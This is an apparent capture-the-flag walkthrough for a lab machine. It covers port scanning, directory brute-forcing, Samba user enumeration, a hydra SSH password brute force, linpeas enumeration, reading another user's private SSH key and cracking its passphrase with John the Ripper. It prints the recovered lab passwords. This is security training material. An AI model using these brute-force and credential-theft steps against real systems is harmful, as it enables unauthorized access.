Task 1. Web App Testing and Privilege Escalation
Deploy the machine and connect to our network
Start the machine and connect to the THM network using openvpn or the attack box.
Find the services exposed by the machine
# nmap -p- -A 10.10.204.61
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Found 6 ports open.
What is the name of the hidden directory on the web server(enter name without /)?
For this we are going to use gobuster with the dirbuster directory-medium wordlist
# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Scan returned 2 directories
/development (Status: 301) [Size: 316] [–> http://10.10.20.44/development/]
/server-status (Status: 403) [Size: 299]
User brute-forcing to find the username & password
We could use hydra with username/password lists to try and bruteforce passwords but since we have Samba ports exposed we will enumerate Samba shares, using a tool called enum4linux
Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.
# enum4linux -U -a 10.10.204.61
Share Enumeration on 10.10.204.61
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Found 2 usernames and 2 shares.
What is the username?
What is the password?
OK since we have a username and port 22 (SSH) exposed we can try bruteforcing the password using Hydra in combination with the rockyou wordlist.
Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh
[ssh] host: 10.10.204.61 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Success, Hydra found the password
Answer 6. armando
Question 7. What service do you use to access the server(answer in abbreviation in all caps)?
From our initial nmap scan we know that port 22 SSH is open so we will connect to the server using Secure Shell using username jan and password armando.
# ssh firstname.lastname@example.org
enter the password and we are in.
Enumerate the machine to find any vectors for privilege escalation
Now that we have access to the server with jan’s account we can automate this process using linpeas script, the script can be found:
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz
So let’s get the script and copy it over to the server using jan’s credentials.
# git clone https://github.com/carlospolop/PEASS-ng.git
Navigate to the directory containing the linpeas.sh (PEASS-ng/linPEAS/linpeas.sh)
# scp linpeas.sh email@example.com:/tmp
Once the transfer is complete, run the script. This takes some time so be patient.
Script returned a lot of interesting files but most valuable of all are Kay’s private ssh keys.
What is the name of the other user you found(all lower case)?
We got that from question 4 (enum4linux).
If you have found another user, what can you do with this information?
From the linpeas output we can see that Kay’s ssh private key is readable so we will exploit this to ssh-login with Kay and see if we can find the final password.
The location of the private key is
What is the final password you obtain?
OK so, in order to login with Kay’s private key you need to provide a passphrase (which we don’t know) since his key is password protected. Let’s store the key in a file for now.
$ cat /home/kay/.ssh/id_rsa
File containing the key on my local machine.
# nano /tmp/id_kay
Copy and paste the output to a file in your local pc.
Since we already have the private key we can try to figure out the password for the key using JohnTheRipper suite.
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
Ssh2john is part of John The Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys) ] private key to john format for later cracking using JtR
# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay
john /tmp/s2j_kay –wordlist =/usr/share/wordlist/rockyou.txt
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/sa6_123..*7¡Vamos!
Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.
Enter passphrase.. and we are in. Now let’s have a look at this pass.bak file.
$ cat pass.bak